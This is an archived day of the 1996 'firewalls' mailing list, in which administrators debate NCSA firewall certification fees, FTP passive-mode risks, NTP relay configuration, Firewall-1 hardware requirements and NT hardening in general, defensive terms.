From firewalls-owner Mon Jul 1 01:33:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA27214 for firewalls-outgoing; Mon, 1 Jul 1996 01:20:54 -0700 (PDT) Received: from uucp.DK.net (uucp.DK.net [193.88.44.47]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA27169 for ; Mon, 1 Jul 1996 01:20:41 -0700 (PDT) From: michaelf@amitech.dk Received: from pingnet (uucp@localhost) by uucp.DK.net (8.6.12/8.6.12) with UUCP id KAA08138 for firewalls@GreatCircle.COM; Mon, 1 Jul 1996 10:17:56 +0200 Received: by ic1.ic.dk id AA14216 Received: from ice-tfs by ic1.ic.dk with UUCP id AA14073 Message-Id: <199607010815.AA14073@ic1.ic.dk> Date: Mon, 1 Jul 1996 10:18:05 +0200 To: firewalls@GreatCircle.COM Subject: RE: NT Backoffice "Catapult" firewall ce X-Mailer: TFS Gateway V210U0459W X-Charset: Latin1 X-Char-Esc: 29 X-Relay-Mailer: Icerelay 0.1.4.6 (Send any queries to postmaster@ic.dk) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The "list" Bill Stout put together, where can I get it ? Btw. It is very impressive that you have been securing NT systems for 5 years! I mean, v3.1 was released in 1993. (don't flame, I think it is OK to over do something when it serves a purpose! "michael@memra.com" certainly have a bit in his head permanenlty turned against NT ?!??) Michael Frandsen michaelf@amitech.dk ---------- From: Russ.Cooper@RC.Toronto.on.ca Sent: 01. July 1996 03:21 To: "'johnb@aztec.co.za'" ; Mon, 1 Jul 1996 04:35:29 -0700 (PDT) Received: from slip-ppp10.ottawa.net (slip-ppp10.ottawa.net [205.211.5.10]) by dns.ottawa.net (8.7.5/1.2) with SMTP id HAA26749; Mon, 1 Jul 1996 07:32:42 -0400 (EDT) Date: Mon, 1 Jul 1996 07:32:42 -0400 (EDT) Message-Id: <199607011132.HAA26749@dns.ottawa.net> X-Sender: bjm@ottawa.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: CMH@Interramp.com From: bjm@ottawa.net (Brian McIntosh) Subject: Re: NCSA Certification Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> >> Incorrect. Only those vendors who were members knew. First, you had to join. > Any firewall vendor who doesn't know what's going on with NCSA (and in particular with their firewall vendors working group) is not a vendor that I would want to buy a firewall from. If a vendor chooses to conduct business as though they were living alone on an isolated island then they shouldn't complain when the rest of the world throws a party and they aren't invited. Regards, Brian ======================================================== Brian J. McIntosh UniSol Inc. 53 Courtney Road Tel: 613 831 6373 Kanata, Ontario Fax: 613 831 4739 Canada, K2L 1M1 Email: bjm@ottawa.net ======================================================== From firewalls-owner Mon Jul 1 05:04:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA07419 for firewalls-outgoing; Mon, 1 Jul 1996 04:38:58 -0700 (PDT) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA07400 for ; Mon, 1 Jul 1996 04:38:40 -0700 (PDT) Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.3-eef) Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) Date: Mon, 1 Jul 1996 12:37:56 +0100 (BST) From: Dave Roberts To: Alex Filacchione Cc: Darwin Martinez Subject: RE: ftp problem In-Reply-To: <01BB61C3.CCAFA240@alexf.iss.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 24 Jun 1996, Alex Filacchione wrote: >> You would need to allow incoming connection from the outside port 20, to >> the inside port >1023 (probably excluding the X11 ports). > > If you do this, then will you not be opening up potential source porting problems? Incoming TCP connections from port 20 on an attacking machine would make it through, no? Isn't the purpose behind PASV ftp specifically to stop this potential problem? Something to think about. Sure, and hence the usual arguement ensues about PASV or not PASV. :-) If you use PASV, then the server has to open up a wide number of ports. If you use normal mode, then you do. Someone takes the risk. Someone mentioned that FW-1 uses a stateful filter, which could be the answer. If the filter recognises an outgoing FTP connection, then perhaps it then allows incoming connections from that IP's port 20. A little more helpful - perhaps. Dave Roberts | "Surfing the Internet" is a sad term for sad people. Unix Systems Admin | Get a board, find a beach, surf some REAL waves and SAA Consultants Ltd | get a *real* life. Plymouth, U.K. | -=[For PGP Key, send mail with subject of "get pgp"]=- From firewalls-owner Mon Jul 1 05:34:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA11280 for firewalls-outgoing; Mon, 1 Jul 1996 05:28:06 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA11255 for ; Mon, 1 Jul 1996 05:27:55 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id OAA26615; Mon, 1 Jul 1996 14:20:33 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31D7C2D2.25E@apogee-com.fr> Date: Mon, 01 Jul 1996 14:21:38 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Config NTP References: <199606280840.KAA08501@mailimailo.univ-rennes1.fr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I need to configure a firewall as an NTP relay... I will use 2 or 3 french public servers (Is this enough to avoid any time spoof ?) and relay it to internal servers. I built a first configuration scheme, and I am interested by any comment on such a config -------------------------------------- driftfile /usr/local/ntp/ntp.drift statsdir /usr/local/ntp/stats/ disable pll # firewall won't be affected enable monitor enable stats restrict default notrust nomodify peer external_ntp_server_1 restrict external_ntp_server_1 peer ... restrict ... broadcast my_subnet --------------------------------------- I won't use any authentication on the site, since I trust my firewall (Well... :^) and all the servers will be managed by the same team. Any advice would be welcomed ! Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Mon Jul 1 05:49:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA11917 for firewalls-outgoing; Mon, 1 Jul 1996 05:37:41 -0700 (PDT) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA11910 for ; Mon, 1 Jul 1996 05:37:33 -0700 (PDT) Message-Id: <199607011237.FAA11910@miles.greatcircle.com> Received: by habanero.jmu.edu Date: Mon, 1 Jul 1996 08:34:50 -0400 From: gary flynn To: firewalls@GreatCircle.COM Subject: Re: NCSA Certification Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think some important important questions need to asked: > > 1. Who appointed the NCSA as the proper body to approve firewalls? > I think your questions are valid but I think the underlying principle is "lead, follow, or get the hell out of the way" :-) From firewalls-owner Mon Jul 1 06:19:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14993 for firewalls-outgoing; Mon, 1 Jul 1996 06:11:34 -0700 (PDT) Received: from maddie.atlantic.com (maddie.atlantic.com [198.252.200.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA14962 for ; Mon, 1 Jul 1996 06:11:24 -0700 (PDT) Received: (pokey@localhost) by maddie.atlantic.com (8.6.10/8.6.11) id JAA26894; Mon, 1 Jul 1996 09:00:51 -0400 From: Rick Romkey Message-Id: <199607011300.JAA26894@maddie.atlantic.com> Subject: Re: Hardware requirements of Firewall-1 To: baysalc@boun.edu.tr (Can BAYSAL) Date: Mon, 1 Jul 1996 09:00:51 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Can BAYSAL" at Jun 30, 96 03:08:07 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Hi there; > I wonder what is the REAL minimum required configuration of > Firewall-1. The book says that Sun SPARC based system, I do not think > this means IPX :) , does it? For example on a 10 Mbits ethernet would a > Sparc 5 be acceptable? Firewall-1 can even run on Intel hardware. In its 2.0 release, you can install it on Solaris for Intel...it works great. Of course, in its 2.1 release you can run under NT, so Intel is definately an option. -Rick ---------------------------------------------------------------------------- Rick E Romkey | A T L A N T I C | Internet pokey@atlantic.com | Computing Technology Corporation | Specialists (860) 667-9596 | http://www.atlantic.com/ | ----------------------------------------------------------------------------- From firewalls-owner Mon Jul 1 06:49:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA18706 for firewalls-outgoing; Mon, 1 Jul 1996 06:47:24 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA18688 for ; Mon, 1 Jul 1996 06:47:17 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id IAA16324; Mon, 1 Jul 1996 08:43:11 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id IAA05949; Mon, 1 Jul 1996 08:37:29 -0500 Received: by sonic.nmti.com; id AA04872; Mon, 1 Jul 1996 08:37:28 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607011337.AA04872@sonic.nmti.com.nmti.com> Subject: Re: Stateful Packet Screens To: shaver@neon.ingenia.ca (Mike Shaver) Date: Mon, 1 Jul 1996 08:37:28 -0500 (CDT) Cc: avalon@coombs.anu.edu.au, chris@dejong.com, Firewalls@GreatCircle.COM In-Reply-To: <199606302141.RAA31883@neon.ingenia.com> from "Mike Shaver" at Jun 30, 96 05:41:40 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As Darren pointed out, it's possible to do everything an AG does with > an SPS, and vice versa. However, in practical terms, you can't get a stateful packet filter that will do all the stuff even the simplest application level gateways do as a matter of course, and for a simple configuration it's much easier to get the existing ALGs configured right than the existing SPFs. In theory, you and Darren are correct. In practice, existing implementations do fall into clumps with user convenience and performance being highest for packet filters, and administrative convenience and security being highest for proxies. From firewalls-owner Mon Jul 1 07:04:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA19240 for firewalls-outgoing; Mon, 1 Jul 1996 06:56:03 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA19233 for ; Mon, 1 Jul 1996 06:55:56 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id IAA17120; Mon, 1 Jul 1996 08:53:11 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id IAA06021; Mon, 1 Jul 1996 08:42:51 -0500 Received: by sonic.nmti.com; id AA05303; Mon, 1 Jul 1996 08:42:51 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607011342.AA05303@sonic.nmti.com.nmti.com> Subject: Re: NT Backoffice "Catapult" firewall certified? To: michael@memra.com (Michael Dillon) Date: Mon, 1 Jul 1996 08:42:51 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Michael Dillon" at Jun 30, 96 03:25:07 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Looking for a specific mailing list? http://www.liszt.com has the largest > list of mailing lists available on the Internet. You have to be careful. They don't do much checking and a hell of a lot of the lists they come up with are defunct, private, or innacurately described. I don't think it would be practical for them to even try, given the number of lists... just keep that in mind. > With around 48,000 lists > in their database it appears that there are 3 times as many mailing lists > as USENET discussion groups. I would imagine so, since I have three or four mailing lists they don't include (small, special purpose lists... they *won't* include them if I have anything to do with it). From firewalls-owner Mon Jul 1 07:18:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19641 for firewalls-outgoing; Mon, 1 Jul 1996 07:04:19 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA19631 for ; Mon, 1 Jul 1996 07:04:04 -0700 (PDT) Message-Id: <199607011404.HAA19631@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: Stateful Packet Screens To: peter@baileynm.com (Peter da Silva) Date: Mon, 1 Jul 1996 23:58:17 +1000 (EST) Cc: shaver@neon.ingenia.ca, Firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: <9607011337.AA04872@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jul 1, 96 08:37:28 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Peter da Silva, sie said: > > > As Darren pointed out, it's possible to do everything an AG does with > > an SPS, and vice versa. > > However, in practical terms, you can't get a stateful packet filter that > will do all the stuff even the simplest application level gateways do as > a matter of course, and for a simple configuration it's much easier to > get the existing ALGs configured right than the existing SPFs. The simplest application gateways just forward data, in sequence. I class things like "tcp-relay", etc, as AG's. Even plug-gw isn't that complicated, compared to, say, ftp-gw. > In theory, you and Darren are correct. In practice, existing implementations > do fall into clumps with user convenience and performance being highest for > packet filters, and administrative convenience and security being highest > for proxies. Time permitting, I'll make you eat those words. From firewalls-owner Mon Jul 1 07:50:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23379 for firewalls-outgoing; Mon, 1 Jul 1996 07:39:11 -0700 (PDT) Received: from smtp1.interramp.com (smtp1.interramp.com [38.8.45.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA23365; Mon, 1 Jul 1996 07:39:05 -0700 (PDT) Received: from [38.12.99.250] by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) Date: Mon, 1 Jul 1996 10:34:58 -0400 X-Sender: ir002446@38.8.32.2 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: gary flynn , firewalls@GreatCircle.COM From: CMH@Interramp.com (Corey M. Horowitz) Subject: Re: NCSA Certification Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:34 AM 7/1/96, gary flynn wrote: >> I think some important important questions need to asked: >> >> 1. Who appointed the NCSA as the proper body to approve firewalls? >> > >I think your questions are valid but I think the underlying >principle is "lead, follow, or get the hell out of the way" :-) I think you're all missing the point. I have no problem with the concept of the NCSA or any other responsible body acting as a protector of the public interest in insuring that all firewall products deliver the security promised or, at a minimum, necessary to adequately protect our networks. The mission statement is admirable. The execution is faulty. According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this regard like a government agency for the commercial sector." (Communications Week. June 17). What goverment agency requires membership for a fee prior to testing a vendors product? Moreover, isn't the NCSA's list just an advertisement unless all firewall vendors are invited to have their product tested irrespective of membership in the NCSA? Does the list state that it is an ad for the NCSA and its members? Mr Tippett adds " "you shouldn't buy a firewall that hasn't been tested and certified, just like youshuldn't buy a lamp that does not have a UL stamp on it." (Communications Week, June 17). I don't believe the UL is a for-profit organization nor is any vendor's product not acceptable for testing. The issue here is disclosure and proper execution of a responsible mission. ------------ Corey M. Horowitz CMH Capital Management Corp. 909 Third Avenue 9th Floor New York, N.Y. 10022 CMH@Interramp.com 212-293-3082 (voice) 212-293-3090 (fax) From firewalls-owner Mon Jul 1 08:04:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA24027 for firewalls-outgoing; Mon, 1 Jul 1996 07:46:41 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA24007 for ; Mon, 1 Jul 1996 07:46:30 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id QAA30859; Mon, 1 Jul 1996 16:43:32 +0200 From: John Betts Message-Id: <199607011443.QAA30859@rbit.co.za> Subject: Re: NT Backoffice "Catapult" firewall certified? To: dleblanc@iss.net (David LeBlanc) Date: Mon, 1 Jul 1996 16:43:31 +0200 (SAT) Cc: firewalls@greatcircle.com In-Reply-To: <2.2.32.19960701134725.009546f4@mail.iss.net> from "David LeBlanc" at Jul 1, 96 09:47:25 am Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk % This isn't true. Guest doesn't have permissions to write the registry. % Besides which, the first thing you do when setting up an NT machine is to % disable guest. Somewhat like taking the + out of the rhosts file on a Sun. % In my haste to clear my mailbox, I didnt give 100% truths. I didnt mean to imply that Guest could do _anything_ to the registry, just some things (remotely). Not every person who puts NT boxes (or any other unix box for that matter) on the Internet knows about things like disabling guest account, setting permissions on shares correctly, etc. I am fairly sure that _MY_ nt box is fairly secure, but that's only because I spent time going through anything that I could think of to secure it. My main point against NT firewalls is the following: _as a general rule_ people who want NT firewalls, want them because any tom, dick and harry can get them going, without extensive knowledge of security and tcp/ip. I have no problem with firewalls that are so easy to administer,etc, BUT, generally, the people who setup these easy-to-use firewalls, dont know/think about things like disabling guest account (I know, lame example), or setting permissions on shares (or disabling all shares, or whatever), etc, and if the firewall software dosnt do this for them, then their firewall host can be easilly compromised.... It takes time and knowledge (well, more like common sense) to make an NT box secure(ish). We all know that a large majority of ppl who insist on NT because of its ease of use, and requirement for little-to no knowledge of system administration and security, dont have the time and knowledge to secure their box. I hope that I did not offend or mislead anyone here. if so, I'm sorry, and you are welcome to flame my procmail^H^H^H^H^H^H^H^Hme ;-) ciao -- John -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 The world is complex. The Sendmail configuration reflects this. From firewalls-owner Mon Jul 1 08:34:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA27172 for firewalls-outgoing; Mon, 1 Jul 1996 08:21:06 -0700 (PDT) Received: from interlock.mgh.com (interlock.mgh.com [152.159.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA27103 for ; Mon, 1 Jul 1996 08:20:48 -0700 (PDT) From: dnewman@mcgraw-hill.com Received: by interlock.mgh.com id AA14150 Message-Id: <199607011517.AA14150@interlock.mgh.com> Received: by interlock.mgh.com (Protected-side Proxy Mail Agent-1); Date: Mon, 01 Jul 96 09:09:19 edt Subject: NT security--Bill Stout's list Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Russ Cooper writes: >> "Because NT has even more security holes than Irix *duck*, I wont list >> them here," >Its interesting that you should say this. Bill Stout put a very good list >together, but a number of those issues can be addressed. . . Russ, can you please post a URL for this list? TIA. Regards David Newman From firewalls-owner Mon Jul 1 08:49:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA28880 for firewalls-outgoing; Mon, 1 Jul 1996 08:38:39 -0700 (PDT) Received: from delta.eecs.nwu.edu (delta.eecs.nwu.edu [129.105.5.103]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA28873 for ; Mon, 1 Jul 1996 08:38:33 -0700 (PDT) Received: (from bonomi@localhost) by delta.eecs.nwu.edu (8.7.4/8.7.3) id KAA04130 for firewalls@GreatCircle.COM; Mon, 1 Jul 1996 10:35:50 -0500 (CDT) Date: Mon, 1 Jul 1996 10:35:50 -0500 (CDT) From: Robert Bonomi Message-Id: <199607011535.KAA04130@delta.eecs.nwu.edu> To: firewalls@GreatCircle.COM Subject: Re: NCSA Certification Sender: firewalls-owner@GreatCircle.COM Precedence: bulk + From: CMH@Interramp.com (Corey M. Horowitz) + Subject: Re: NCSA Certification + Cc: firewalls@GreatCircle.COM + Sender: firewalls-owner@GreatCircle.COM + + At 08:34 AM 7/1/96, gary flynn wrote: + >> I think some important important questions need to asked: + >> + >> 1. Who appointed the NCSA as the proper body to approve firewalls? + >> + > + >I think your questions are valid but I think the underlying + >principle is "lead, follow, or get the hell out of the way" :-) + + + I think you're all missing the point. I have no problem with the concept + of the NCSA or any other responsible body acting as a protector of the + public interest in insuring that all firewall products deliver the security + promised or, at a minimum, necessary to adequately protect our networks. + The mission statement is admirable. The execution is faulty. + + According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this + regard like a government agency for the commercial sector." (Communications + Week. June 17). What goverment agency requires membership for a fee prior + to testing a vendors product? Moreover, isn't the NCSA's list just an + advertisement unless all firewall vendors are invited to have their product + tested irrespective of membership in the NCSA? Does the list state that it + is an ad for the NCSA and its members? + + Mr Tippett adds " "you shouldn't buy a firewall that hasn't been tested + and certified, just like youshuldn't buy a lamp that does not have a UL + stamp on it." (Communications Week, June 17). I don't believe the UL is a + for-profit organization nor is any vendor's product not acceptable for + testing. I'll admit ignorance about UL's for-profit status, and I'll agree that they -wiLl- test anything for anybody. I would point out that they -CHARGE- for doing that testing, however. I'll suggest that there's no problem with NCSA charging a fee for the eval- uation, *even*if* there are different fee schedules for members/non-members. Does anybody _know_ if NCSA -would- test a non-member implementation? From firewalls-owner Mon Jul 1 09:24:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA01765 for firewalls-outgoing; Mon, 1 Jul 1996 09:15:47 -0700 (PDT) Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA01738 for ; Mon, 1 Jul 1996 09:15:37 -0700 (PDT) Received: from langate.tnet.state.tn.us ([170.142.11.126]) by snmpmgr.state.tn.us with SMTP id AA12558 Received: from tn01-Message_Server by langate.tnet.state.tn.us Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 01 Jul 1996 11:14:35 -0500 From: "Samuel T. Baker" To: firewalls@GreatCircle.COM Cc: CMH@Interramp.com Subject: Re: NCSA Certification -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> Corey M. Horowitz 09:34 1 Jul1996 >>> [snip] > What goverment agency requires membership for a fee prior > to testing a vendors product? [snip] Government requires payment of taxes to be a member of the nation and enjoy its services. [snip] > I don't believe the UL is a for-profit organization nor is any vendor's product not > acceptable for testing. [snip] How is the UL funded? How could a funding source be developed for NCSA? (No free lunch.) I expect NCSA would be willing to consider positive suggestions about its role and funding that would enhance its services. Samuel T. Baker . . . standard disclaimer . . . Happy Birthday, Tennessee Celebration of the Centuries, 1796-1996 From firewalls-owner Mon Jul 1 09:56:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04479 for firewalls-outgoing; Mon, 1 Jul 1996 09:39:38 -0700 (PDT) Received: from access1.digex.net (access1.digex.net [205.197.245.192]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA04461 for ; Mon, 1 Jul 1996 09:39:30 -0700 (PDT) Received: from dcc02469.slip.digex.net (dcc02469.slip.digex.net [204.91.213.200]) by access1.digex.net (8.6.12/8.6.12) with SMTP id MAA10634 ; for ; Mon, 1 Jul 1996 12:36:47 -0400 Received: by dcc02469.slip.digex.net with Microsoft Mail Message-ID: <01BB674A.AC194A40@dcc02469.slip.digex.net> From: "Russell L. Jones" To: "'firewalls@GreatCircle.COM'" Subject: General Questions Date: Mon, 1 Jul 1996 12:41:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Where are the archives for this discussion group located? Thanks in advance. From firewalls-owner Mon Jul 1 10:08:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06086 for firewalls-outgoing; Mon, 1 Jul 1996 09:57:57 -0700 (PDT) Received: from gatekeeper.mpsisys.com (ppp.mpsisys.com [198.65.132.134]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06068 for ; Mon, 1 Jul 1996 09:57:44 -0700 (PDT) Received: (from smap@localhost) by gatekeeper.mpsisys.com (8.6.10/8.6.10) id LAA20808 for ; Mon, 1 Jul 1996 11:55:25 -0500 Received: from mpsi.mpsisys.com(139.45.3.26) by gatekeeper.mpsisys.com via smap (V1.3) Received: from omni.mpsisys.com by mpsi.mpsisys.com (AIX 3.2/UCB 5.64/4.03) Received: by omni.mpsisys.com (AIX 4.1/UCB 5.64/4.03) From: ralph@omni.mpsisys.com (Ralph Mitchell) Message-Id: <9607011654.AA15034@omni.mpsisys.com> Subject: Re: NCSA Certification To: firewalls@GreatCircle.COM Date: Mon, 1 Jul 1996 11:54:46 -0500 (CDT) In-Reply-To: from "Corey M. Horowitz" at Jun 30, 96 12:38:03 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Every vendor still knew what it was about and could have joined. Let's > >say you and your friends are told you can make an investment, but can > >only find out how to make the investment pay off until you do invest. > >And you decide not to do it, but everyone else does. Do you now cry > >'unfair, unfair' if it pays off for them?!? I would think not. > > > Certainly not. However, the NCSA is now holding itself out as the > firewall approval body. Fine, don't they have an obligation to the public > to review all firewalls, not just their paying members? They way they do > it is paying off to them to the detriment of others and misleading the > public. Without full disclosure, their list is misleading. I don't know much about NCSA, but unless *all* their equipment is donated and *all* their staff are volunteers, someone has to foot the bill... OK, so maybe instead of insisting on vendors paying a membership fee they could charge non-members a reasonable hourly or daily rate for the testing. But then, who decides what's 'reasonable' ? :) Would say, $100 per hour, or $1000 per day be considered 'reasonable' ? Wouldn't take too many days to add up to $22,000... :) And then, I guess, we'd have people bitching about "It cost me twice as much to have my whizz-bang XYZ firewall tested, compared to the FireBall from Great Walls of Fire Corp..." Before anyone wastes bandwidth stating the obvious, I realize that a more complex firewall would take more time (and money...) to fully test... My point is that it's gonna cost someone, somewhere, a pile of money to put together the equipment and expertise to properly test each firewall, and it's not at all unreasonable to expect the vendor to pay, whether it be a flat-rate membership fee, or a per-hour/per-firewall fee. Just my $0.02... Ralph Mitchell (System Administrator) -- MPSI Inc., 8282 South Memorial Drive, Tulsa, Oklahoma 74133 Email: ralph@mpsisys.com PHONE: 918-250-9611 x237 FAX: 918-254-8764 "Never underestimate the power of human stupidity" - Salvor Hardin, Foundation From firewalls-owner Mon Jul 1 10:29:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04138 for firewalls-outgoing; Mon, 1 Jul 1996 09:36:13 -0700 (PDT) Received: from access1.digex.net (access1.digex.net [205.197.245.192]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA04079 for ; Mon, 1 Jul 1996 09:35:51 -0700 (PDT) Received: from dcc02469.slip.digex.net (dcc02469.slip.digex.net [204.91.213.200]) by access1.digex.net (8.6.12/8.6.12) with SMTP id MAA10567 ; for ; Mon, 1 Jul 1996 12:33:04 -0400 Received: by dcc02469.slip.digex.net with Microsoft Mail Message-ID: <01BB674A.2AC7D240@dcc02469.slip.digex.net> From: "Russell L. Jones" To: "'firewalls@GreatCircle.COM'" Subject: Cisco Router security Date: Mon, 1 Jul 1996 12:38:03 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks? Russell L. Jones From firewalls-owner Mon Jul 1 10:38:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA07914 for firewalls-outgoing; Mon, 1 Jul 1996 10:16:54 -0700 (PDT) Received: from firewall.cwa.com (firewall.cwa.com [192.100.4.193]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA07857 for ; Mon, 1 Jul 1996 10:16:36 -0700 (PDT) Received: by firewall.cwa.com (4.1/CWA-SMI-4.1) Received: from cwa.com(192.100.4.14) by firewall via smap (V1.3jcf) Received: from hilo.cwa.com by cwa.com (4.1/CWA-PSI-SMI-1.0) Received: by hilo.cwa.com (SMI-8.6/SMI-SVR4) Date: Mon, 1 Jul 1996 10:13:26 -0700 From: dmurphy@cwa.com (Dan Murphy x286) Message-Id: <199607011713.KAA12285@hilo.cwa.com> To: firewalls@GreatCircle.COM Subject: Re: NCSA Certification Cc: CMH@Interramp.com, gary@habanero.jmu.ed X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At the risk of 